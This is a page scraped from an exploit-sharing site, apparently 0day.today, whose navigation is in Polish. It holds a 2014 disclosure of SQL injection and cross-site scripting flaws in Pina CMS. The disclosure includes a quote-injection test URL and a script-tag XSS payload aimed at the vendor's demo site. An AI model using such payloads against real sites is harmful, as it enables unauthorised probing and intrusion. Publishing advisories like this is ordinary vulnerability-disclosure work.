0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pina CMS SQL Injection and XSS Vulnerabilities
Autor
Ryzyko
![](/img/risk/critlow_3.gif)
Wysokie Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
############################################################################ # Title: Pina CMS SQL Injection and XSS Vulnerabilities # Vendor: www.pinacms.com # Vendor Notified: 15-02-2014 # Vendor Replied: 16-02-2014 # Release in Public: 18-02-2014 # Tested on: Windows/Linux # Author/Found by: Shadman Tanjim # Website: www.secupent.com and www.vulnerability.io # Email: [email protected] or [email protected] # Twitter: twitter.com/secupent # Facebook: fb.me/secupent ############################################################################ 1. Vulnerability no 1 (SQL Injection): http://target.com/page.php?action=post.manage.home&blog_id=1%27%22 Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png 2. Vulnerability no 2. (XSS): Go to this link: http://demo.pinacms.com/page.php?action=post.manage.home Apply this JavaScript on search bar "/><script>alert(574127);</script> Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters..... # 0day.today [2024-07-02] #